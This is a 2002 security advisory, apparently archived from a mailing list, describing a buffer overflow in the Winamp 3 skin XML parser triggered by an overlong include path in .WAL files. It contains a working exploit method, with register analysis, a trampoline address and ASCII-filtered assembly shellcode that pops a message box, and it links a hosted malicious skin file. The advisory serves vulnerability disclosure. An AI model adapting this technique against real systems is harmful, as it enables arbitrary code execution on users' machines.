('binary' encoding is not supported, stored as-is) [ Illegal Instruction Labs Advisory ] [------------------------------------------------------------------------] Advisory name: Winamp 3 (1.0.0.488) XML parser buffer overflow vulnerability Application: Winamp 3 1.0.0.488 Homepage: www.winamp.com Impact: There is a buffer overflow inside XML parser DLL that can cause execution of arbitrary code. Platform: All x86 win32, not tested on x86 Linux Date: 29.9.2002 Tested on: Windows Me (4.90) Discovered by: Sunnis Mail me @: annihilatorat_private ======[ Overview Winamp is (as we all know), the most popular MP3 player for Windows. Winamp 3 is a revolutionary succesor of Winamp 2.xx having many new features, such as a new skinning system. ======[ Problem Winamp 3 skin files are *.WAL and are automatically opened by MSIE. They are actually ZIP files with altered extension. They contain pictures and configuration files used by wsabi (Winamp skinning system). Wsabi engine is implemented inside wasabi.dll and is designed to provide very configurable, OS-independant system for building skinnable applications, quickly and easily (that's the reason why wsabi.dll is 800K big). A buffer overflow inside wsabi.dll may occur if <include file="PATH"/> tag is altered with extremely huge value for file PATH (btw, MAX_PATH on win32 is defined to be only 512B). This can allow the execution of arbitrary code inside the address space of Winamp. Wsabi filters most non- printable characters but specially designed shellcode will still pass through. ======[ Exploit By writing an extremely long string of 'A' chars and setting the kerenl- mode debugger to capture page faults, one can see that at the point of execution, both EAX and EBX contain pointers to [OverwrittenEIP-4]. ESP is unusable since it points to some strange value. Winamp3 exe (studio.exe) loads many system DLLs wich contain some usable instructions: jmp eax jmp ebx call eax call ebx On Windows Me there is such on 0x736D2120 (we can't use some of the Winamp's modules since their ASCII imagebase representation is NOT considered to be valid (between 0x20 and 0x7F) by Wsabi and will trigger an error message). Stack would look like this: ['AAAAAAAAAAAA'... XXXX[OverwrittenEIP][shellcode] ^^^^-address contained inside EAX and EBX Sample proof of concept shellcode would look like this: ; ASCII opcode representation: jmp __skip ; ë+ db 0, 0 dd 736D2120h <- call eax db 25h dup ('A') ; needed because of JMP __skip: mov eax, 39406567h ; ¸ge@ sub eax, 794c2421h ; -!$Ly push eax ; P pop ecx ; Y ; eax = bff44146 = USER32!MessageBoxA on winMe push 'aaaa' ; haaaa pop eax ; X xor eax, 'aaaa' ; 5aaa ; eax = 0 push eax ; P = NULL-terminator push "tiol" ; hloit push "pxe " ; h exp push "tpec" ; hcept push "noc-" ; h-con push "fo-f" ; hf-of push "oorp" ; hproo push " 3pm" ; hmp3 push "aniW" ; hWina push esp ; T pop edx ; Z ; edx = ptr to string push eax ; P push eax ; P push edx ; R push eax ; P push ebx ; S = return address push eax ; Q = user32!MessageBoxA (v. 4.90.3000) retn ; Ă Filtering chars doesn't provide any protection at all. Writing alphanumeric shellcode using specialized kits such as irx's ASC is even easier. You can try this one here: kamikaza.ffk.hr/advisory/default.wal It works on WinMe (4.90) only, but adaptation on other win32s is trivial. ======[ Greetz Greets go to all members of IIL (http://www.ii-labs.tk): BoyScout, DownBload, Fr1c, h4z4rd, StYx and (in no specific order): Elrond, harlequin, St0rm, Megaquad, Dark-igor, bila, phreax, Defiant and everyone else i forgot.
This archive was generated by hypermail 2b30 : Mon Sep 30 2002 - 14:35:01 PDT